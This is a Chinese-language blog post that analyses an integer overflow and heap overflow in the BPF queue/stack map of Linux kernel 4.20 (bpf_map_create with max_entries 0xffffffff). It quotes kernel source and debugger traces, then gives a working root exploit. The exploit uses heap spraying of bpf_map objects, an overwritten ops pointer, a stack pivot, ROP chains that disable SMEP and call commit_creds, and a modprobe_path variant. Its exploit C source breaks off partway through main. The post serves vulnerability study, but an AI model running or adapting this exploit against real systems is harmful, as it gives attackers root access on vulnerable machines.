Linux_Kernle_4.20-整数溢出和堆溢出漏洞分析

2021-04-17

字数统计: 5.7k字 | 阅读时长≈ 29分

4.20 Linux Kernel中 bpf 模块存在一个整数溢出漏洞，并且通过整数溢出漏洞可以构造一个堆溢出漏洞。由于没有开启PIE，所以可以通过在slub中堆喷 bpf_map结构体，最后通过采用类似 ptmx的方法实现 ROP提权

漏洞分析

漏洞存在于 BPF模块，该模块主要用于用户态定义数据包过滤方法，如常见的抓包工具都基于此实现，并且用户态的 Seccomp功能也与此功能相似。可参考该文档。

其本质上是一种内核代码注入技术：

内核中实现了一个 cBPF/eBPF虚拟机；
用户态可以用C来写运行的代码，再通过一个 Clang&LLVM的编译器将C代码编译成BPF目标码；
用户态通过系统调用 bpf()将 BPF目标码注入到内核当中；
内核通过 JIT(Just-In-Time)将BPF编码转换成本地指令码；如果当前架构不支持 JIT转换内核则会使用一个解析器(Interpreter)来模拟运行，这种运行效率较低；
内核在 packet filter和 tracing等应用中提供了一系列的钩子来运行 BPF代码

整数溢出漏洞

整数溢出漏洞存在于 BPF_MAP_CREATE功能，是 bpf系统调用的一部分，可参考手册：

SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr __user *, uattr, unsigned int, size)
{
	union bpf_attr attr = {};
	int err;

	if (sysctl_unprivileged_bpf_disabled && !capable(CAP_SYS_ADMIN))
		return -EPERM;

	err = bpf_check_uarg_tail_zero(uattr, sizeof(attr), size);
	if (err)
		return err;
	size = min_t(u32, size, sizeof(attr));

	/* copy attributes from user space, may be less than sizeof(bpf_attr) */
	if (copy_from_user(&attr, uattr, size) != 0)	//将用户输入拷贝到 attr
		return -EFAULT;

	err = security_bpf(cmd, &attr, size);
	if (err < 0)
		return err;

	switch (cmd) {
	case BPF_MAP_CREATE:		//功能函数
		err = map_create(&attr);	//生成 bpf_map结构
		break;
	case BPF_MAP_LOOKUP_ELEM:
		err = map_lookup_elem(&attr);
		break;
	case BPF_MAP_UPDATE_ELEM:
		err = map_update_elem(&attr);	//调用修改data
		break;

从上可以看到其处理函数是 map_create，如下所示。在 1 处创建了一个 map结构体，并为其分配编号，此后利用编号寻找生成的 map：

/* called via syscall */
static int map_create(union bpf_attr *attr)
{
	int numa_node = bpf_map_attr_numa_node(attr);
	struct bpf_map *map;
	int f_flags;
	int err;

	err = CHECK_ATTR(BPF_MAP_CREATE);
	if (err)
		return -EINVAL;

	f_flags = bpf_get_file_flag(attr->map_flags);
	if (f_flags < 0)
		return f_flags;

	if (numa_node != NUMA_NO_NODE &&
	    ((unsigned int)numa_node >= nr_node_ids ||
	     !node_online(numa_node)))
		return -EINVAL;

	/* find map type and init map: hashtable vs rbtree vs bloom vs ... */
	map = find_and_alloc_map(attr);	//创建map结构体，并为其分配编号，此后利用编号寻找生成的map
	if (IS_ERR(map))
		return PTR_ERR(map);

	err = bpf_obj_name_cpy(map->name, attr->map_name);
	if (err)
		goto free_map_nouncharge;

	atomic_set(&map->refcnt, 1);
	atomic_set(&map->usercnt, 1);

	if (attr->btf_key_type_id || attr->btf_value_type_id) {
		struct btf *btf;

		if (!attr->btf_key_type_id || !attr->btf_value_type_id) {
			err = -EINVAL;
			goto free_map_nouncharge;
		}

		btf = btf_get_by_fd(attr->btf_fd);
		if (IS_ERR(btf)) {
			err = PTR_ERR(btf);
			goto free_map_nouncharge;
		}

		err = map_check_btf(map, btf, attr->btf_key_type_id,
				    attr->btf_value_type_id);
		if (err) {
			btf_put(btf);
			goto free_map_nouncharge;
		}

		map->btf = btf;
		map->btf_key_type_id = attr->btf_key_type_id;
		map->btf_value_type_id = attr->btf_value_type_id;
	}

	err = security_bpf_map_alloc(map);
	if (err)
		goto free_map_nouncharge;

	err = bpf_map_init_memlock(map);
	if (err)
		goto free_map_sec;

	err = bpf_map_alloc_id(map);
	if (err)
		goto free_map;

	err = bpf_map_new_fd(map, f_flags);
	if (err < 0) {
		/* failed to allocate fd.
		 * bpf_map_put() is needed because the above
		 * bpf_map_alloc_id() has published the map
		 * to the userspace and the userspace may
		 * have refcnt-ed it through BPF_MAP_GET_FD_BY_ID.
		 */
		bpf_map_put(map);
		return err;
	}

	return err;

free_map:
	bpf_map_release_memlock(map);
free_map_sec:
	security_bpf_map_free(map);
free_map_nouncharge:
	btf_put(map->btf);
	map->ops->map_free(map);
	return err;
}

find_and_alloc_map函数，对于传入参数的含义如结构体所示，可以看到程序首先根据 attr->type，寻找所对应的处理函数虚表，在2处根据处理函数虚表的不同，调用不同的函数进行处理。

struct {    /* Used by BPF_MAP_CREATE */
		__u32         map_type;
		__u32         key_size;    /* size of key in bytes */
		__u32         value_size;  /* size of value in bytes */
		__u32         max_entries; /* maximum number of entries
		                                in a map */
};

static struct bpf_map *find_and_alloc_map(union bpf_attr *attr)
{
	const struct bpf_map_ops *ops;
	u32 type = attr->map_type;
	struct bpf_map *map;
	int err;

	if (type >= ARRAY_SIZE(bpf_map_types))
		return ERR_PTR(-EINVAL);
	type = array_index_nospec(type, ARRAY_SIZE(bpf_map_types));
[2]	ops = bpf_map_types[type];	//根据虚表获得函数指针
	if (!ops)
		return ERR_PTR(-EINVAL);

	if (ops->map_alloc_check) {
		err = ops->map_alloc_check(attr);
		if (err)
			return ERR_PTR(err);
	}
	if (attr->map_ifindex)
		ops = &bpf_map_offload_ops;
[3]	map = ops->map_alloc(attr);	//调用函数
	if (IS_ERR(map))
		return map;
	map->ops = ops;
	map->map_type = type;
	return map;
}

该函数存在的虚函数位于 queue_stack_map_alloc，查看内核可以计算其触发所需的type值，即 (0xFFFFFFFF82028438 - 0xFFFFFFFF82028380）/8 = 0x17 ：

汇编指令：
.text:FFFFFFFF8119D17A                 mov     eax, r14d
.text:FFFFFFFF8119D17D                 mov     r15, ds:bpf_map_types[rax*8]

虚表：
.rodata:FFFFFFFF82028380 bpf_map_types   dq 0                    ; DATA XREF: map_create+AD↑r
... ...
.rodata:FFFFFFFF82028410                 dq offset unk_FFFFFFFF8210F0A0
.rodata:FFFFFFFF82028418                 dq offset unk_FFFFFFFF82029B00
.rodata:FFFFFFFF82028420                 dq offset unk_FFFFFFFF8202A680
.rodata:FFFFFFFF82028428                 dq offset unk_FFFFFFFF82029B00
.rodata:FFFFFFFF82028430                 dq offset unk_FFFFFFFF82029C40
.rodata:FFFFFFFF82028438                 dq offset off_FFFFFFFF82029BA0
... ...
.rodata:FFFFFFFF82029BA0                 dq offset queue_stack_map_alloc_check
.rodata:FFFFFFFF82029BA8                 dq offset queue_stack_map_alloc
.rodata:FFFFFFFF82029BB0                 dq 0
.rodata:FFFFFFFF82029BB8                 dq offset queue_stack_map_free
.rodata:FFFFFFFF82029BC0                 dq offset queue_stack_map_get_next_key
.rodata:FFFFFFFF82029BC8                 dq 0
.rodata:FFFFFFFF82029BD0                 dq offset queue_stack_map_lookup_elem
.rodata:FFFFFFFF82029BD8                 dq offset queue_stack_map_update_elem
.rodata:FFFFFFFF82029BE0                 dq offset queue_stack_map_delete_elem
.rodata:FFFFFFFF82029BE8                 dq offset queue_stack_map_push_elem
.rodata:FFFFFFFF82029BF0                 dq offset stack_map_pop_elem
.rodata:FFFFFFFF82029BF8

程序在 3处调用漏洞函数，queue_stack_map_alloc，在该函数中利用 sizeof(bpf_queue_stack)+attr->value_size*(attr->max_entries+1)来申请堆空间，而 attr中内容均为用户输入，可以看到当 max_entries为 0xffffffff时，将仅申请大小 sizeof(bpf_queue_stack)的堆块，此函数相当于申请了相邻的内存，其中前 sizeof(bpf_queue_stack)个字节为管理块，用于存储数据结构，后面的内容为数据存储结构。

static struct bpf_map *queue_stack_map_alloc(union bpf_attr *attr)
{
	int ret, numa_node = bpf_map_attr_numa_node(attr);
	struct bpf_queue_stack *qs;
	u32 size, value_size;
	u64 queue_size, cost;

	size = attr->max_entries + 1;
	value_size = attr->value_size;

	queue_size = sizeof(*qs) + (u64) value_size * size;

	cost = queue_size;
	if (cost >= U32_MAX - PAGE_SIZE)
		return ERR_PTR(-E2BIG);

	cost = round_up(cost, PAGE_SIZE) >> PAGE_SHIFT;

	ret = bpf_map_precharge_memlock(cost);
	if (ret < 0)
		return ERR_PTR(ret);

	qs = bpf_map_area_alloc(queue_size, numa_node);
	if (!qs)
		return ERR_PTR(-ENOMEM);

	memset(qs, 0, sizeof(*qs));

	bpf_map_init_from_attr(&qs->map, attr);

	qs->map.pages = cost;
	qs->size = size;

	raw_spin_lock_init(&qs->lock);

	return &qs->map;
}

当申请完成后，初始化函数 bpf_map_init_from_attr如下，相当于 copy了用户输入的 attr：

void bpf_map_init_from_attr(struct bpf_map *map, union bpf_attr *attr)
{
	map->map_type = attr->map_type;
	map->key_size = attr->key_size;
	map->value_size = attr->value_size;
	map->max_entries = attr->max_entries;
	map->map_flags = attr->map_flags;
}

当此申请完成后，内核模块将这个堆块放入管理结构中，并生成 id用于管理，并将 id返回给用户。

堆溢出漏洞

上述的整数溢出漏洞，将导致内存分配时仅仅分配了管理块的大小而没有分配实际存储数据的内存。如果存在编辑功能则一定会有问题，下面堆溢出漏洞就是由此导致。

漏洞存在于 map_update_elem函数中：

static int map_update_elem(union bpf_attr *attr)
{
	void __user *ukey = u64_to_user_ptr(attr->key);
	void __user *uvalue = u64_to_user_ptr(attr->value);
	int ufd = attr->map_fd;
	struct bpf_map *map;
	void *key, *value;
	u32 value_size;
	struct fd f;
	int err;

	if (CHECK_ATTR(BPF_MAP_UPDATE_ELEM))
		return -EINVAL;

	f = fdget(ufd);
	map = __bpf_map_get(f);
	if (IS_ERR(map))
		return PTR_ERR(map);

	if (!(f.file->f_mode & FMODE_CAN_WRITE)) {
		err = -EPERM;
		goto err_put;
	}

	key = __bpf_copy_key(ukey, map->key_size);
	if (IS_ERR(key)) {
		err = PTR_ERR(key);
		goto err_put;
	}

	if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY ||
	    map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE)
		value_size = round_up(map->value_size, 8) * num_possible_cpus();
	else
		value_size = map->value_size;

	err = -ENOMEM;
	value = kmalloc(value_size, GFP_USER | __GFP_NOWARN);	//分配堆块
	if (!value)
		goto free_key;

	err = -EFAULT;
	if (copy_from_user(value, uvalue, value_size) != 0)//拷贝用户输入到堆块
		goto free_value;
	//下面根据ops调用相应的虚函数
	/* Need to create a kthread, thus must support schedule */
	if (bpf_map_is_dev_bound(map)) {
		err = bpf_map_offload_update_elem(map, key, value, attr->flags);
		goto out;
	} else if (map->map_type == BPF_MAP_TYPE_CPUMAP ||
		   map->map_type == BPF_MAP_TYPE_SOCKHASH ||
		   map->map_type == BPF_MAP_TYPE_SOCKMAP) {
		err = map->ops->map_update_elem(map, key, value, attr->flags);
		goto out;
	}

	/* must increment bpf_prog_active to avoid kprobe+bpf triggering from
	 * inside bpf map update or delete otherwise deadlocks are possible
	 */
	preempt_disable();
	__this_cpu_inc(bpf_prog_active);
	if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH) {
		err = bpf_percpu_hash_update(map, key, value, attr->flags);
	} else if (map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY) {
		err = bpf_percpu_array_update(map, key, value, attr->flags);
	} else if (map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE) {
		err = bpf_percpu_cgroup_storage_update(map, key, value,
						       attr->flags);
	} else if (IS_FD_ARRAY(map)) {
		rcu_read_lock();
		err = bpf_fd_array_map_update_elem(map, f.file, key, value,
						   attr->flags);
		rcu_read_unlock();
	} else if (map->map_type == BPF_MAP_TYPE_HASH_OF_MAPS) {
		rcu_read_lock();
		err = bpf_fd_htab_map_update_elem(map, f.file, key, value,
						  attr->flags);
		rcu_read_unlock();
	} else if (map->map_type == BPF_MAP_TYPE_REUSEPORT_SOCKARRAY) {
		/* rcu_read_lock() is not needed */
		err = bpf_fd_reuseport_array_update_elem(map, key, value,
							 attr->flags);
	} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
		   map->map_type == BPF_MAP_TYPE_STACK) {
		err = map->ops->map_push_elem(map, value, attr->flags);
	} else {
		rcu_read_lock();
		err = map->ops->map_update_elem(map, key, value, attr->flags);
		rcu_read_unlock();
	}
	__this_cpu_dec(bpf_prog_active);
	preempt_enable();
	maybe_wait_bpf_programs(map);
out:
free_value:
	kfree(value);
free_key:
	kfree(key);
err_put:
	fdput(f);
	return err;
}

即 bpf系统调用的第三个功能函数。首先根据用户输入的 id找到放入管理结构的 map，利用 kmalloc新建一个堆块根据 Map中存储的 value_size，从用户输入拷贝。然后在map中找到存储的虚函数指针 ops，然后根据 ops调用相应的虚函数。这里调用的函数为 queue_stack_map_push_elem函数：

static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
				     u64 flags)
{
	struct bpf_queue_stack *qs = bpf_queue_stack(map);
	unsigned long irq_flags;
	int err = 0;
	void *dst;

	/* BPF_EXIST is used to force making room for a new element in case the
	 * map is full
	 */
	bool replace = (flags & BPF_EXIST);

	/* Check supported flags for queue and stack maps */
	if (flags & BPF_NOEXIST || flags > BPF_EXIST)
		return -EINVAL;

	raw_spin_lock_irqsave(&qs->lock, irq_flags);

	if (queue_stack_map_is_full(qs)) {
		if (!replace) {
			err = -E2BIG;
			goto out;
		}
		/* advance tail pointer to overwrite oldest element */
		if (unlikely(++qs->tail >= qs->size))
			qs->tail = 0;
	}

	dst = &qs->elements[qs->head * qs->map.value_size];
	memcpy(dst, value, qs->map.value_size);	//从上一步函数新建的地址向计算得到的地址拷贝，大小为 qs->size

	if (unlikely(++qs->head >= qs->size))
		qs->head = 0;

out:
	raw_spin_unlock_irqrestore(&qs->lock, irq_flags);
	return err;
}

queue_stack_map_push_elem函数会从上一步存储用户输入的堆块拷贝数据到利用数据存储管理结构体计算的地址，大小为 qs->size。此时，qs->head在新建的时候被初始化为0，此时出现堆溢出，溢出大小可以控制即初始化是输入的 value_size，位置是从新建的第一个堆块以后直接溢出：

每一个map里包含多个小块内存，value_size是每一个小块的大小，max_entries是小块的数量，每次可以写一个小块的内容。

总结

在bpf系统中，会调用 map_create来创建一个 map结构体；
在 map_create函数中会根据用户传入的 attr参数调用 find_and_alloc_map函数来创建一个 map结构体；
在 find_and_alloc_map函数中，会根据传入的参数 attr->type从虚表中寻找对应的函数指针，然后会调用对应的函数根据 attr生成一个 map结构体；
漏洞的虚函数指针为 queue_stack_map_alloc，其触发所需的 type值为 0x17，在 queue_stack_map_alloc中，函数利用 sizeof(bpf_queue_stack)+attr->value_size*(attr->max_entires+1)来申请堆空间，而 attr中内容均为用户输入。所以这里可以构造 attr->max_entries为 0xffffffff造成整数溢出漏洞，使得申请的堆块仅包含 bpf_queue_stack这个管理结构体；
当申请 map 完成后，会从用户输入的 attr中拷贝对应的参数到 map中，也即该结构体用户也可以控制。
其次用户可以调用漏洞函数 map_update_elem，首先根据用户输入的 id找到管理结构体 map，随后根据 map->value_size调用 kmalloc新建一个堆块，并将用户输入拷贝到 map中。然后在 map中找到存储的虚函数指针 ops，根据 ops调用相应的虚函数。
调用的虚函数这里为 queue_stack_map_push_elem函数，在该函数中会调用 memcpy函数向计算得到的地址将第6步中得到的 map拷贝到目标地址中，大小为 qs->size。而这里计算得到的地址是在管理结构体之后，而 qs->size是我们可以自己输入的，也就是这里存在一个 堆溢出漏洞。

漏洞利用

由于默认仅采用smep保护，关闭 smap、kaslr、kpti。

首先经过动态分析，会发现通过 kmalloc申请的大小为 0x100，且是从 kmalloc-256上分配。那么利用思路即考虑在 kmalloc-256链上布置堆风水。

总结一下上面的漏洞利用要求：

申请的堆块大小固定为 0x100
堆溢出仅能向相邻的堆块溢出

这里的想法是：

现在kmalloc-256上堆喷射大量含有函数指针的堆块；
利用堆溢出漏洞，修改相邻的堆块里的函数指针，实现劫持控制流

堆喷

这里最开始想到的就是 tty_struct，但是这里受到大小限制，不可能将 tty_struct喷射到 kmalloc-256的链上。

这里选用的是 bpf自带的一个结构体 bpf_queue_stack，如下所示：

struct bpf_queue_stack {
	struct bpf_map map;
	raw_spinlock_t lock;
	u32 head, tail;
	u32 size; /* max_entries + 1 */

	char elements[0] __aligned(8);
};

struct bpf_map {
	/* The first two cachelines with read-mostly members of which some
	 * are also accessed in fast-path (e.g. ops, max_entries).
	 */
	const struct bpf_map_ops *ops ____cacheline_aligned;
	struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
	void *security;
#endif
	enum bpf_map_type map_type;
	u32 key_size;
	u32 value_size;
	u32 max_entries;
	u32 map_flags;
	u32 pages;
	u32 id;
	int numa_node;
	u32 btf_key_type_id;
	u32 btf_value_type_id;
	struct btf *btf;
	bool unpriv_array;
	/* 55 bytes hole */

	/* The 3rd and 4th cacheline with misc members to avoid false sharing
	 * particularly with refcounting.
	 */
	struct user_struct *user ____cacheline_aligned;
	atomic_t refcnt;
	atomic_t usercnt;
	struct work_struct work;
	char name[BPF_OBJ_NAME_LEN];
};
/* map is generic key/value storage optionally accesible by eBPF programs */
struct bpf_map_ops {
	/* funcs callable from userspace (via syscall) */
	int (*map_alloc_check)(union bpf_attr *attr);
	struct bpf_map *(*map_alloc)(union bpf_attr *attr);
	void (*map_release)(struct bpf_map *map, struct file *map_file);
	void (*map_free)(struct bpf_map *map);
	int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
	void (*map_release_uref)(struct bpf_map *map);

	/* funcs callable from userspace and from eBPF programs */
	void *(*map_lookup_elem)(struct bpf_map *map, void *key);
	int (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
	int (*map_delete_elem)(struct bpf_map *map, void *key);
	int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
	int (*map_pop_elem)(struct bpf_map *map, void *value);
	int (*map_peek_elem)(struct bpf_map *map, void *value);

	/* funcs called by prog_array and perf_event_array map */
	void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
				int fd);
	void (*map_fd_put_ptr)(void *ptr);
	u32 (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
	u32 (*map_fd_sys_lookup_elem)(void *ptr);
	void (*map_seq_show_elem)(struct bpf_map *map, void *key,
				  struct seq_file *m);
	int (*map_check_btf)(const struct bpf_map *map,
			     const struct btf_type *key_type,
			     const struct btf_type *value_type);
};

在 bpf_queue_stack中，含有 bpf_map，而在 bpf_map中的含有一个 bpf_map_ops包含大量的结构体指针。而我们可以调用 BPF_MAP_CREATE功能来申请 bpf_map_ops结构，那么这里就可以实现堆喷射。

劫持控制流

通过 BPF_MAP_CREATE函数创建的 bpf__map结构体大小为 0xd0，而系统分配的 slub大小为 0x100，而 bpf_map的第一个结构体即为 bpf_map_ops结构体。所以总体堆块布局应该如下，所以我们堆溢应该溢出 0x30，就刚好能够修改紧邻的 bpf_map结构体的 bpf_map_ops结构体。

|			 	  |  |					  |
|		bpf_map	  |	 |ops	|	bpf_map	  |	
|<---- 0xd0----- >|	 |					  |
|<------0x100------->|<------0x100------->|

实现函数指针改写后，又如何来触发调用该函数指针呢？由于 ops内含有很多虚表指针，就有可能通过 dereference这些函数指针中的任何一个实现控制流劫持，获得 rip的控制权。为了找到使用的这些函数指针的方法，原文提到了一种 under-context fuzzing + symbolic execution的方法，通过 fuzzing来寻找，这一个技术我目前还不太了解，希望后续可以接触到吧。最终，其找到了 map_release的 dereference如下所示：

/* called from workqueue */
static void bpf_map_free_deferred(struct work_struct *work)
{
    struct bpf_map *map = container_of(work, struct bpf_map, work);

    bpf_map_release_memlock(map);
    security_bpf_map_free(map);
    /* implementation dependent freeing */
    map->ops->map_free(map);
}

当我们对 bpf_map调用 close函数时，会将 bpf_map_free_deferred()添加到队列并随后执行，通过 ops.map_free设为我们自己的 gadget，就能实现控制流劫持。

这里我分别尝试 ROP和 modprobe_path的方法来进行提权。

ROP

这个方法和之前所作的 TokyoWesterns-gnote很相似。首先利用一个栈迁移的 gadget，这里当然还是 xchg esp, eax，这里选择如下所示：

1 2	0xffffffff81954dc8: xchg esp,eax 0xffffffff81954dc9: ret 0x674

那么我们的ROP需要布置在 (0xffffffff81954dc8&0xffffffff)+0x674处。布置的 ROP就和正常 Kernel-rop提权相同。ROP如下：

p_rax_r,
0x6f0,
mv_cr4_rax_r,//
p_rdi_r,
0,
PREPARE_KERNEL_CRED,
p_rsi_r, //: pop rsi ; ret
p_rdi_r,
push_rax_push_rsi_r,//: push rax; push rsi; ret; 
COMMIT_CREDS,
swapgs,
0x246,
iretq,
(unsigned long)&get_shell,
user_cs,
user_rflags,
user_sp,
user_ss

漏洞调试

如下所示 rax=0xffffffff，加上1后发生整数溢出。

*RAX  0xffffffff
 RBX  0xffffc900003c7ec8 ◂— 0x17
*RCX  0xffffeffe
*RDX  0x40
 RDI  0xffffc900003c7ec8 ◂— 0x17
 RSI  0x0
 R8   0x1
 R9   0x0
 R10  0x0
 R11  0x0
 R12  0xffffffffffffffff
 R13  0x2
 R14  0xffffffff
 R15  0xffffffff82029ba0 —▸ 0xffffffff811aedd0 ◂— mov    edx, dword ptr [rdi + 0xc] /* 0x8b1f74d2850c578b */
 RBP  0x0
 RSP  0xffffc900003c7e40 ◂— 0x10
*RIP  0xffffffff811af0d7 ◂— add    eax, 1 /* 0x49d0af0f4801c083 */
────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────
   0xffffffff811af0c6    je     0xffffffff811af0cc <0xffffffff811af0cc>

   0xffffffff811af0c8    mov    r14d, dword ptr [rdi + 0x18]
   0xffffffff811af0cc    mov    eax, dword ptr [rdi + 0xc]
   0xffffffff811af0cf    mov    edx, dword ptr [rdi + 8]
   0xffffffff811af0d2    mov    ecx, 0xffffeffe
 ► 0xffffffff811af0d7    add    eax, 1
   0xffffffff811af0da    imul   rdx, rax
   0xffffffff811af0de    mov    r12, rax
   0xffffffff811af0e1    mov    rax, -7
   0xffffffff811af0e8    lea    r13, [rdx + 0x100]
   0xffffffff811af0ef    cmp    r13, rcx

当我们使用分配了 bpf_map结构体如下 0xffff88807f934600所示。从 0xd0溢出0x30修改后一个 bpf_map的 bpf_map_ops指向 0xa000000000用户态伪造的 fake_bpf_map_ops。

pwndbg> x/20xg 0xffff88807f934600
0xffff88807f934600:     0xffffffff82029ba0      0x0000000000000000
0xffff88807f934610:     0xffff8880798aaef8      0x0000000000000017
0xffff88807f934620:     0xffffffff00000040      0x0000000100000000
0xffff88807f934630:     0xffffffff00000001      0x0000000000000000
0xffff88807f934640:     0x0000000000000000      0x0000000000000000
0xffff88807f934650:     0x0000000000000000      0x0000000000000000
0xffff88807f934660:     0x0000000000000000      0x0000000000000000
0xffff88807f934670:     0x0000000000000000      0x0000000000000000
0xffff88807f934680:     0xffff88807f9aeb00      0x0000000100000001
0xffff88807f934690:     0x0000000000000000      0x0000000000000000

pwndbg> x/20xg 0xffff88807f934600+0xd0
0xffff88807f9346d0:     0x0000000000000001      0x0000000000000002
0xffff88807f9346e0:     0x0000000000000003      0x0000000000000004
0xffff88807f9346f0:     0x0000000000000005      0x0000000000000006
0xffff88807f934700:     0x000000a000000000      0x0000000000000008
0xffff88807f934710:     0xffff8880798aaf10      0x0000000000000017
0xffff88807f934720:     0xffffffff00000040      0x0000000100000000
0xffff88807f934730:     0xffffffff00000002      0x0000000000000000
0xffff88807f934740:     0x0000000000000000      0x0000000000000000
0xffff88807f934750:     0x0000000000000000      0x0000000000000000
0xffff88807f934760:     0x0000000000000000      0x0000000000000000

而在 0xa000000000中伪造 map_release，然后将其指向栈迁移的 gadget，如下所示：

1 2	0xffffffff81954dc8 xchg eax, esp 0xffffffff81954dc9 ret 0x674

这里 ROP需要注意绕过 smep，修改 cr4寄存器。

/ $ ./exp-rop              
Prepare ROP                
Alloc pbf                  
Heap Spry                  
Update bpf                 
Trigger rop                
Get root                   
/ # id                     
uid=0(root) gid=0(root)

modprobe_path

如果想要使用 modprobe_path其实也是要利用 ROP来完成，不过 ROP执行的内容不再是提权，而是修改 modprobe_path的内容。ROP如下：

   p_rax_r,
   0x6f0,
   mv_cr4_rax_r,//
p_rdi_r,
   modprobe_path_addr,
   p_rsi_r,
   target_sh_addr,
   p_rdx_r,
   0x20,
   memcpy_addr,

   swapgs,
   0x246,
   iretq,
   (unsigned long)&get_shell,
   user_cs,
   user_rflags,
   user_sp,
   user_ss

这里就是先利用 rop执行 memcpy(modprobe_path, target, 0x20)函数。然后手动执行 /tmp/ll，就能够将 flag的权限进行修改。

1	-rwxrwxrwx 1 root root 11 Apr 17 08:01 flag

EXP

ROP：

//gcc exp.c -static -masm=intel -fno-pie -o exp
//Author: A1ex
//reference: P4nda
#define _GNU_SOURCE
#define SPRAY_NUMBER 14

#include <signal.h>
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#ifndef __NR_bpf
#define __NR_bpf 321
#endif

size_t user_cs, user_rflags, user_ss, user_sp;
size_t xchg_eax_rsp_r = 0xffffffff81954dc8;
size_t p_rdi_r = 0xffffffff810013b9;
size_t p_rsi_r = 0xffffffff81001c50;
size_t push_rax_push_rsi_r = 0xffffffff81264e0b;
size_t mv_cr4_rax_r = 0xffffffff810037d5;
size_t p_rax_r = 0xffffffff81029c71;
size_t prepare_kernel = 0xffffffff810E3D40;
size_t commit_creds = 0xffffffff810E3AB0;
size_t swaqgs = 0xffffffff81c00d5a;
size_t iretq = 0xffffffff8106d8f4;
size_t mv_rdi_rax_p_r = 0x0;
uint64_t r[1] = {0xffffffffffffffff};

void Err(char* buf){
    printf("%s Error\n");
    exit(-1);
}

void getshell(){
    if(!getuid()){
        system("/bin/sh");
    }
    else{
        Err("Not root");
    }
}

void shell()
{
    puts("Get root");
    char *shell = "/bin/sh";
    char *args[] = {shell, NULL};
    execve(shell, args, NULL);
}

void getroot(){
    char* (*pkc)(int) = prepare_kernel;
    void (*cc)(char*) = commit_creds;
    (*cc)((*pkc)(0));
}

void savestatus(){
       __asm__("mov user_cs,cs;"
           "mov user_ss,ss;"
           "mov user_sp,rsp;"
           "pushf;"            //push eflags
           "pop user_rflags;"
          );
}

unsigned long victim[SPRAY_NUMBER];
void HeapSpry(){
    int i;
    for(i=0;i<SPRAY_NUMBER;i++){
        victim[i] = syscall(__NR_bpf, 0, 0x200011c0, 0x2c);
    }
}

void* fake_ops;
void Prepare_ROP(){
    char* rop_mem = mmap((void*)(xchg_eax_rsp_r&0xfffff000), 0x2000, PROT_READ|PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    unsigned long* rop_addr = (unsigned long*)((xchg_eax_rsp_r & 0xffffffff)+0x674);
    fake_ops = mmap((void *)0xa000000000,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);

    *(unsigned long*)(xchg_eax_rsp_r&0xffffffff) = p_rax_r;
    int i = 0;
    rop_addr[i++] = p_rax_r;
    rop_addr[i++] = 0x6f0;
    rop_addr[i++] = mv_cr4_rax_r;
    rop_addr[i++] = p_rdi_r;
    rop_addr[i++] = 0;
    rop_addr[i++] = prepare_kernel;
    rop_addr[i++] = p_rsi_r;
    rop_addr[i++] = p_rdi_r;
    rop_addr[i++] = push_rax_push_rsi_r;
    rop_addr[i++] = commit_creds;

    // 
    rop_addr[i++] = swaqgs;
    rop_addr[i++] = 0;
    rop_addr[i++] = iretq;
    rop_addr[i++] = (size_t) &shell;
    rop_addr[i++] = user_cs;
    rop_addr[i++] = user_rflags;
    rop_addr[i++] = user_sp;
    rop_addr[i++] = user_ss;

    *(unsigned long*)(fake_ops+0x4000) = 0;
    *(unsigned long*)(fake_ops+0x3000) = 0;
    *(unsigned long*)(fake_ops+0x2000) = 0;
    *(unsigned long*)(fake_ops+0x1000) = 0;
    *(unsigned long*)(fake_ops) = 0;
    *(unsigned long*)(fake_ops+0x10) = xchg_eax_rsp_r;
    *(unsigned long*)(fake_ops+0x7000) = 0;
    *(unsigned long*)(fake_ops+0x6000) = 0;
    *(unsigned long*)(fake_ops+0x5000) = 0;
}

int main(){
    //signal(SIGSEGV,get_shell_again);
    //get_shell();
    syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
    long res = 0;
    *(uint32_t*)0x200011c0 = 0x17;  //map_type
    *(uint32_t*)0x200011c4 = 0;     //key_size
    *(uint32_t*)0x200011c8 = 0x40;  //value_size 需拷贝的用户字节数
    *(uint32_t*)0x200011cc = -1;    //max_entries=0xffffffff构造整数溢出
    *(uint32_t*)0x200011d0 = 0;     //map_flags
    *(uint32_t*)0x200011d4 = -1;    //inner_map_fd
    *(uint32_t*)0x200011d8 = 0;     //numa_node
    *(uint8_t*)0x200011dc = 0;
    *(uint8_t*)0x200011dd = 0;
    *(uint8_t*)0x200011de = 0;
    *(uint8_t*)0x200011df = 0;
    *(uint8_t*)0x200011e0 = 0;
    *(uint8_t*)0x200011e1 = 0;
    *(uint8_t*)0x200011e2 = 0;
    *(uint8_t*)0x200011e3 = 0;
    *(uint8_t*)0x200011e4 = 0;
    *(uint8_t*)0x200011e5 = 0;
    *(uint8_t*)0x200011e6 = 0;
    *(uint8_t*)0x200011e7 = 0;
    *(uint8_t*)0x200011e8 = 0;
    *(uint8_t*)0x200011e9 = 0;
    *(uint8_t*)0x200011ea = 0;
    *(uint8_t*)0x200011eb = 0;

    savestatus();
